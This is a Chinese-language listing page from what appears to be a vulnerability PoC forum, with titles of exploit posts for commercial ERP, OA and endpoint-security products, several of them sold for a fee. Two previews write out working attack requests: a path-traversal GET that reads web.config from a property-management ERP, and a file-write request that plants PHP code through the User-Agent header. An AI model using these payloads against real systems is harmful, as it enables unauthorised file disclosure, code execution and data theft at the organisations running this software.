POC_秃兔安全

天问物业 ERP 系统 AreaAvatarDownLoad.aspx 任意文件读取漏洞

GET /HM/ Main/InformationManage/AreaAvatarDownLoad.aspx?AreaAvatar=../web.config HTTP/1.1Host: xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firef...

2024你懂的

秃兔11个月前

0926

泛微ecology系统setup接口存在信息泄露漏洞

2024你懂的

秃兔11个月前

0926

【通用】金华迪加现场大屏互动系统 qiandao SQL注入

fofa语句pocyaml已验证

付费阅读500 # poc

dreamer2924个月前

09215

金和OA C6-GeneralXmlhttpPage.aspx存在SQL注入漏洞

2024你懂的

秃兔11个月前

09214

【通用】泛微e-office index.php sql注入漏洞

fofayakit插件 uuidpocyaml已验证

付费阅读500 # poc

dreamer2927个月前

09210

证书查询系统存在任意文件读取漏洞

2024你懂的

秃兔11个月前

09210

【通用】孚盟云 MailAjax.ashx SQL注入漏洞

fofa语句yakit插件 uuid需要cookie的后台SQL注入pocyakit yamlnuclei yaml已验证

付费阅读500 # poc # yakit # nuclei

dreamer29211个月前

09210

360 新天擎终端安全管理系统存在信息泄露漏洞

2024你懂的

秃兔11个月前

09214

【通用】协众OA系统接口checkLoginQrCode SQL注入漏洞

fofa语句yakit插件uuidpocyakit && nuclei yaml已验证

付费阅读500 # poc # yakit # nuclei

dreamer29211个月前

0927

【通用】usdtAdmin收款管理系统log.php 任意文件写入

fofa语句yakit插件 uuidpocPOST /log.php?c=1&name=123.php HTTP/1.1 Host: xxxx User-Agent: <?php echo 66666;@unlink(__FILE__);?> content=MTIzNDU2 #具体路径会回显。另外注意ua...

付费阅读500 # poc

dreamer2922个月前

0927

上一页 1…23 242526 27…55 下一页跳转